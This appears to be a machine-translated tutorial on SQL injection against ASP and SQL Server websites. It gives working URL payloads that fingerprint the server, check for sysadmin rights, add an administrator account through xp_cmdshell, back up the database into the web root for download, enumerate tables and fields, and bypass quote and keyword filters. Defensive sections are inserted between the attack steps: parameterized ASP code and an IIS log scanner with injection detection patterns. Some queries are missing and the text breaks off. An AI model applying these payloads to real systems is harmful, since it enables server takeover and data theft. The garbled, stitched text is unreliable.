SQL Server Injection Attack
With the growth of application development under the B/S (browser/server) model, more and more programmers write applications in this mode. However, the entry threshold of the industry is low and the skill and experience of programmers is uneven, so a large proportion of programmers do not check the legality of user input when writing code, and their applications carry security risks. A user can submit some database query code and, from the results the program returns, learn data he wants to know; this is what is commonly called a SQL injection attack. It can let unscrupulous users read your data, change server settings, or, when you are not paying attention, take over your server. SQL injection is not a problem of SQL Server itself but of improperly written programs. If you want to run such programs, you must understand that they carry a certain degree of risk.
To understand SQL injection you should first understand some basic knowledge of applications in B/S mode, as well as some browser and server knowledge. Given domestic conditions, ASP + Access or SQL Server sites account for more than 70% of domestic websites, PHP + MySQL for 20%, and everything else for less than 10%. In the ASP + SQL Server application structure, an ASP program is a SQL Server client; it needs a legitimate SQL login name and password to connect to the SQL Server database. The following is a typical piece of ASP code for connecting to SQL Server:
<%
' Build the ODBC connection string from the server, login, password and database variables
strconn = "driver={sql server};server=" & rServer & ";uid=" & rUid & ";pwd=" & rPWD & ";database=" & rDatabase
Set conn = Server.CreateObject("ADODB.Connection")
conn.open strconn
%>
The SQL injection vulnerability arises where the developer builds a WHERE clause by concatenating the user's input. For example, the following is a simple ASP program, article_show.asp, whose function is to take an ID from the GET parameters and display the contents of the article with that ID from the info_article table in the database.
<tr class="trtitle">
<td><div align="center"><%= rs("title") %><br></div></td>
</tr>
<tr class="trcontent">
</tr>
</table>
Note the statement strSQL = "select * from info_article where ID =" & strID. At run time the client accesses the ASP program with a URL like http://www.abc.com/article_show.asp?ID=12; when ID is the number 12, strID holds the string "12". The VBScript "&" operator can concatenate data of any type, so after concatenation strSQL holds the string select * from info_article where ID = 12, which is a normal SQL statement. VBScript is a weakly typed language: variables have no type declaration (they need not even be declared), which is sometimes convenient for programmers but also makes it easy to leave many loopholes in a program. Because this program does not restrict the type of the variable strID, it has a SQL injection vulnerability.
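The following is an added example of how article_show.asp can be written so that strID never becomes part of the SQL text; it is not code from the original article. It validates that ID is a plain positive integer before any query is built, then binds it as a typed ADO parameter. It assumes the connection string is stored in Application("ConnString") (set in global.asa) and that the table is info_article with columns ID, title and content; those names are assumptions. The same approach also answers the later point about filtering: there is no keyword or quote filter to bypass, because the input is never interpreted as SQL.

```vbscript
<%
' Added example, not code from the original article: a hardened article_show.asp.
' Assumptions: the connection string is in Application("ConnString") (set in global.asa)
' and the table is info_article(ID int, title, content); the column names are assumed.
Option Explicit

' ADO constants normally taken from adovbs.inc, repeated here so the page stands alone
Const adCmdText    = 1
Const adInteger    = 3
Const adParamInput = 1

' Accepts only a plain positive integer (at most 9 digits, so it fits an int column).
' "12 '", "12 and 1=2" and "(SELECT TOP 1 ...)" all fail this test before any SQL is built.
Function TryParseArticleId(rawId, ByRef articleId)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    TryParseArticleId = False
    If re.Test(rawId) Then
        articleId = CLng(rawId)
        TryParseArticleId = (articleId > 0)
    End If
End Function

Dim strID, lngID, conn, cmd, rs
strID = Request.QueryString("ID")

If Not TryParseArticleId(strID, lngID) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid article ID"
    Response.End
End If

' Vulnerable original, shown for contrast only (never executed here):
'   strSQL = "select * from info_article where ID =" & strID
' Hardened form: the ID is bound as a typed parameter, never spliced into the SQL text,
' so quotes, comment markers, char()/nchar() tricks and mixed-case keywords are inert.
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnString")

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT title, content FROM info_article WHERE ID = ?"
cmd.Parameters.Append cmd.CreateParameter("@ID", adInteger, adParamInput, , lngID)
Set rs = cmd.Execute

If rs.EOF Then
    Response.Write "No such article"
Else
    ' HTMLEncode keeps stored content from being rendered as markup (a separate concern from SQL)
    Response.Write "<table><tr class=""trtitle""><td><div align=""center"">" & _
                   Server.HTMLEncode(rs("title") & "") & "<br></div></td></tr>"
    Response.Write "<tr class=""trcontent""><td>" & _
                   Server.HTMLEncode(rs("content") & "") & "</td></tr></table>"
End If

rs.Close
conn.Close
%>
```

Two further points follow from the article's own testing section: the SQL login the ASP page connects with should be an ordinary database user, not a member of sysadmin or db_owner, so that even a flaw elsewhere cannot reach xp_cmdshell or BACKUP DATABASE; and IIS should be configured not to send detailed ASP error messages to remote clients, since the article relies on those messages to read data back.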
Part 2: Testing
http://www.abc.com/article_show.asp?ID=12'
This is an illegal SQL Server query, so the server returns the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Unclosed quotation mark before the character string ''.
This error shows that this web site can be attacked by injection.
In some cases the server only shows "An error occurred on the server when processing the URL", because IIS has been configured not to send detailed error messages to the client. That does not necessarily mean injection is impossible, but it becomes considerably harder and depends on luck.
In some cases the server displays the content for ID = 12 and shows no error message at all; the developer may be filtering single quotation marks. You can then try the following:
article_show.asp?ID=12 and 1=2
If the following error appears at this point, injection may be possible:
Error '80020009'
Exception occurred.
Note: when the following error message appears, injection certainly cannot be carried out:
Application uses a value of the wrong type for the current operation.
Once injection has been confirmed to be possible, the server can be tested with the following methods.
Returns:
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int.
Returns:
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'webuser' to a column of data type int.
Returns:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'sitelog' to a column of data type int.
This SQL statement tests whether the currently logged-on user is in the sysadmin server role: it returns 1 if so and 0 if not. Here we convert the result to a character in order to see the specific numeric value, so we write the following URL (char(115) is the character 's', and %2B is the URL encoding of the plus sign (+)):
Returns:
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the varchar value 's0' to a column of data type int.
'0' means the user is not a member of the 'sysadmin' group; '1' means it is.
Returns:
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the varchar value 's1' to a column of data type int.
This already yields a lot of valuable information. If the test shows that the current user is a member of the sysadmin group, there is a large possibility of running a cmd shell on this SQL Server. If it is db_owner, any operation on the currently connected database is possible, such as creating tables, deleting tables, inserting data, reading data and so on.
Part 4: Operations a sysadmin user can carry out
Note: from here on the server's detailed error messages are no longer needed; only the SQL statements are used.
Add an NT user:
article_show.asp?ID=12;EXEC master..xp_cmdshell "net user name password /add"--
article_show.asp?ID=12;EXEC master..xp_cmdshell "net localgroup name administrators /add"--
Back up the complete database into the web site directory for download:
article_show.asp?ID=12;BACKUP DATABASE databasename TO DISK='c:\Inetpub\wwwroot\1.db';--
Remove a login from the sysadmin fixed server role:
After the operations above, the server will generally display the following information or show the ID = 12 web page normally:
Error '80020009'
Exception occurred.
Ordinary users cannot use the commands listed in part 4, but can still read out all the data in the database.
Use the following statement to list the first table name in the database:
article_show.asp?ID=(SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE='U' AND STATUS>0 AND NAME NOT IN(''))
Suppose the first table obtained is called info_files; use the following statement to get the second table:
article_show.asp?ID=(SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE='U' AND STATUS>0 AND NAME NOT IN('info_files'))
Suppose the second table is called info_articles; use the following statement to get the third table:
article_show.asp?ID=(SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE='U' AND STATUS>0 AND NAME NOT IN('info_files','info_articles'))
Use the following statement to get the first field name of table info_users:
Use the following statement to get the second field name of table info_users:
Assuming the structure of info_users is ID, username, password, use the following statement to get the username value of the first record:
article_show.asp?ID=(SELECT TOP 1 CHAR(115)%2BCAST(ID AS VARCHAR(2)) FROM info_users)
Many developers filter the ' character as a way to "prevent" injection vulnerabilities, but the relevant functions can still be used to bypass the program's restrictions. For example, look at how these words can be transformed:
Something simple such as where xtype = 'U': the ASCII code of the character U is 85, so where xtype = char(85) can be used in its place; if the characters are Chinese, such as where name = '用户' ("user"), where name = nchar(29992) + nchar(25143) can be used instead.
Some people filter the keywords Select, Update and Delete but forget about case, so we can try selecT.
If that gets nowhere, we may as well look at the site's login form; for convenience, the form field names are generally the same as the input names that are checked.
Special note: in the address bar, + is interpreted as a space, %2B is interpreted as the + sign, and %25 as the % sign; refer to the relevant URLEncode documentation for details.
When the Get method is used, IIS logs the whole string you submit; the Post method is not recorded, so on websites where Post can be used, avoid Get as far as possible.
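The note above that IIS records the whole query string of a GET request is also what makes these probes visible to an administrator. As an added example, not from the original article, the following WSH script (run with cscript) reviews W3C extended log lines for the patterns this article shows: the single quote, and 1=2, stacked ;EXEC calls, xp_cmdshell, BACKUP DATABASE, sysobjects/SELECT TOP enumeration, char()/nchar() encodings and the -- comment marker. The log lines are constructed samples; the #Fields: header is parsed to locate cs-uri-query, and each query is URL-decoded first so that + and %XX forms are matched the same way SQL Server would have received them.

```vbscript
' Added example, not from the original article. Run with: cscript scan_iis_log.vbs
' Reviews W3C extended log lines for the injection probe patterns shown in the article.
' The #Fields: header is parsed to find cs-uri-query, so no column layout is assumed.
' The sample lines at the bottom are constructed, not real traffic.
Option Explicit

' Patterns are applied to the URL-decoded query, case-insensitively (so selecT is caught).
Dim SuspiciousPatterns
SuspiciousPatterns = Array( _
    "'", _
    "\band\s+1\s*=\s*[12]\b", _
    ";\s*exec\b", _
    "xp_cmdshell", _
    "\bbackup\s+database\b", _
    "\bsysobjects\b", _
    "\bselect\s+top\b", _
    "\bn?char\s*\(", _
    "--")

' Decodes '+' and %XX so that encoded probes (%27, %2B) match the same way as plain ones.
Function UrlDecode(s)
    Dim i, c, out, hex2
    Set hex2 = New RegExp
    hex2.Pattern = "^[0-9A-Fa-f]{2}$"
    out = ""
    i = 1
    Do While i <= Len(s)
        c = Mid(s, i, 1)
        If c = "+" Then
            out = out & " "
        ElseIf c = "%" And hex2.Test(Mid(s, i + 1, 2)) Then
            out = out & Chr(CLng("&H" & Mid(s, i + 1, 2)))
            i = i + 2
        Else
            out = out & c
        End If
        i = i + 1
    Loop
    UrlDecode = out
End Function

' True when the cs-uri-query field matches any pattern; "-" is the W3C marker for no query.
Function IsSuspiciousQuery(csUriQuery)
    Dim i, re, decoded
    IsSuspiciousQuery = False
    If csUriQuery = "-" Or csUriQuery = "" Then Exit Function
    decoded = UrlDecode(csUriQuery)
    Set re = New RegExp
    re.IgnoreCase = True
    For i = 0 To UBound(SuspiciousPatterns)
        re.Pattern = SuspiciousPatterns(i)
        If re.Test(decoded) Then
            IsSuspiciousQuery = True
            Exit Function
        End If
    Next
End Function

' Scans an array of log lines, echoes each flagged line and returns the number flagged.
Function ScanLogLines(lines)
    Dim entry, fields, hits, qIdx, i
    hits = 0
    qIdx = -1
    For Each entry In lines
        If Left(entry, 8) = "#Fields:" Then
            ' Locate the cs-uri-query column from the header line
            fields = Split(Trim(Mid(entry, 9)), " ")
            For i = 0 To UBound(fields)
                If fields(i) = "cs-uri-query" Then qIdx = i
            Next
        ElseIf Left(entry, 1) <> "#" And Len(Trim(entry)) > 0 And qIdx >= 0 Then
            fields = Split(entry, " ")
            If UBound(fields) >= qIdx Then
                If IsSuspiciousQuery(fields(qIdx)) Then
                    hits = hits + 1
                    WScript.Echo "FLAG " & entry
                End If
            End If
        End If
    Next
    ScanLogLines = hits
End Function

' Constructed sample: one normal request followed by the probes the article describes.
Dim sample
sample = Array( _
    "#Software: Microsoft Internet Information Services 6.0", _
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status", _
    "2003-06-24 10:01:02 192.0.2.10 GET /article_show.asp ID=12 200", _
    "2003-06-24 10:01:09 192.0.2.10 GET /article_show.asp ID=12%27 500", _
    "2003-06-24 10:01:15 192.0.2.10 GET /article_show.asp ID=12+and+1=2 500", _
    "2003-06-24 10:01:31 192.0.2.10 GET /article_show.asp ID=12;EXEC+master..xp_cmdshell+%27...%27-- 200", _
    "2003-06-24 10:02:00 192.0.2.10 GET /article_show.asp ID=(SELECT+TOP+1+NAME+FROM+SYSOBJECTS+WHERE+XTYPE=%27U%27) 500", _
    "2003-06-24 10:02:40 192.0.2.10 GET /article_show.asp ID=(SELECT+TOP+1+CHAR(115)%2BCAST(ID+AS+VARCHAR(2))+FROM+info_users) 500")

WScript.Echo ScanLogLines(sample) & " suspicious request(s) flagged out of " & (UBound(sample) + 1) & " lines"
```

On the constructed sample the first data line passes and the five probe lines are flagged. To run it over a real log, replace the sample array with the lines read from the W3C file (for example with FileSystemObject's OpenTextFile and ReadLine). As the article itself points out, POST bodies are not written to the IIS log, so this review covers GET requests only; a 500 status beside a flagged query is a useful secondary signal, because the detailed-error behaviour the article relies on produces exactly that response.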
The SQL Server injection attack described above is not limited to these methods; you can use many SQL statements of your own to cleverly obtain the information you want. After installing SQL Server you will find "SQL Server Books Online", where all of SQL Server's statements, functions, system stored procedures and
Source: http://translate.google.com.ec/translate?hl=en&sl=zh-CN&u=http://www.rj-itop.com/gonggao.php%3Fid%3D4633&ei=2HdBStmhNYmQkAXH-Kz7CA&sa=X&oi=translate&resnum=3&ct=result&prev=/search%3Fq%3Dselect%2Btop%2B1%2Bchar(*)%26hl%3Den%26sa%3DN%26start%3D30